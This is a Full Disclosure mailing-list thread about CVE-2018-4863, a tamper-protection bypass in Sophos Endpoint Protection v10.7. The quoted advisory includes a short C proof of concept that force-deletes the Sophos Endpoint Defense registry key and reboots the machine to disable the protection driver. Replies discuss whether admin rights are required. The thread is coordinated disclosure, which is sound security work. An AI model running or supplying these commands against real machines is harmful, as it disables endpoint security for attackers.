Message-ID: <CAFD2FDObx2V27VGUjYsvX9=+J9v7GEoFn5J_kJrA5wZnGykT=w@mail.gmail.com>
Date: Thu, 5 Apr 2018 00:01:58 -0400
From: hyp3rlinx <apparitionsec@...il.com>
To: Buherátor <buherator@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] CVE-2018-4863 Sophos Endpoint Protection v10.7 / Tamper
 Protection Bypass

 should have included more details for this report, no, you need be admin.
I believe the enhanced tamper protection safeguards the services even in
safe mode among other things like uninstalling etc...


On Wed, Apr 4, 2018 at 3:48 AM, Buherátor <buherator@...il.com> wrote:

> The affected key under HKLM is writable by regular users? A Get-ACL[1]
> output would be appreciated!
>
> And why do you put a batch script inside C code? o.O
>
> [1] https://docs.microsoft.com/en-us/powershell/module/
> microsoft.powershell.security/get-acl?view=powershell-6
>
> Buherátor - @buherator
> PGP: 1DD5 6AFB 0660 4106 7B70  4F71 B84C 47BD 86EA 1855
>
>
> 2018-04-04 6:04 GMT+02:00 hyp3rlinx <apparitionsec@...il.com>:
> > [+] Credits: John Page (aka hyp3rlinx)
> > [+] Website: hyp3rlinx.altervista.org
> > [+] Source:
> > http://hyp3rlinx.altervista.org/advisories/SOPHOS-
> ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt
> > [+] ISR: Apparition Security
> >
> >
> >
> > Vendor:
> > =============
> > www.sophos.com
> >
> >
> >
> > Product:
> > ===========
> > Sophos Endpoint Protection v10.7
> >
> > Sophos Endpoint Protection helps secure your workstation by adding
> > prevention, detection, and response technology on top of your operating
> > system.
> > Sophos Endpoint Protection is designed for workstations running Windows
> and
> > macOS. It adds exploit technique mitigations, CryptoGuard
> anti-ransomware,
> > anti-malware, web security, malicious traffic detection, and deep system
> > cleanup.
> >
> >
> >
> > Vulnerability Type:
> > ===================
> > Tamper Protection Bypass
> >
> >
> > CVE Reference:
> > ==============
> > CVE-2018-4863
> >
> >
> > Security Issue:
> > ================
> > Sophos Endpoint Protection offers an enhanced tamper protection mechanism
> > disallowing changes to be made to the Windows registry
> > by creating and setting a special registry key "SEDEnabled" as follows:
> >
> > HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint
> > Defense\TamperProtection\Config
> > Create the following registry key:
> > "SEDEnabled"=dword:00000001"
> >
> > From "https://community.sophos.com/kb/en-us/124376" documentation:
> > "You must enable the basic Tamper Protection feature on an endpoint in
> > order to use the Enhanced Tamper Protection"
> >
> > However, this protection mechanism can be bypassed by deleting the
> > following registry key as it is not sufficiently protected.
> > "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos
> Endpoint
> > Defense\"
> >
> > By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper
> > Protection" once the system has been rebooted.
> > Attackers can then create arbitrary registry keys or edit keys and
> settings
> > under the protected "tamper" protection config key.
> > The issue undermines the integrity of the endpoint protection as deleting
> > this key stops the tamper protect driver from loading.
> >
> >
> > SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed
> > customers customers are unaffected.
> > All SAV OPM Preview subscribers have had the fix since 2018-03-01.
> >
> >
> >
> > Exploit/POC:
> > =============
> > Compile the below malicious POC "C" code and run on target, PC will
> reboot
> > then we pwn.
> >
> > gcc -o sophos-poc.exe sophos-poc.c
> >
> > "sophos-poc.c"
> >
> > /***SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS
> > Even with "SEDEnabled"=dword:00000001" set in registry to prevent
> tampering
> > https://community.sophos.com/kb/en-us/124376
> > By hyp3rlinx **/
> >
> > int main(void){
> >  system("reg delete
> > \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos
> Endpoint
> > Defense\"  /f");
> >  system("shutdown -t 0 -r -f");
> > return 0;
> > }
> >
> >
> >
> > Network Access:
> > ===============
> > Local
> >
> >
> >
> > Severity:
> > =========
> > High
> >
> >
> >
> > Disclosure Timeline:
> > =============================
> > Vendor Notification: December 4, 2017
> > Vendor Acknowledgement: December 12, 2017
> > Vendor release fixes: March 1, 2018
> > Vendor request additional time before disclosing.
> > additional time has passed.
> > April 4, 2018  : Public Disclosure
> >
> >
> >
> > [+] Disclaimer
> > The information contained within this advisory is supplied "as-is" with
> no
> > warranties or guarantees of fitness of use or otherwise.
> > Permission is hereby granted for the redistribution of this advisory,
> > provided that it is not altered except by reformatting it, and
> > that due credit is given. Permission is explicitly given for insertion in
> > vulnerability databases and similar, provided that due credit
> > is given to the author. The author is not responsible for any misuse of
> the
> > information contained herein and accepts no responsibility
> > for any damage caused by the use or misuse of this information. The
> author
> > prohibits any malicious use of security related information
> > or exploits by the author or elsewhere. All content (c).
> >
> > hyp3rlinx
> >
> > _______________________________________________
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: http://seclists.org/fulldisclosure/
>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists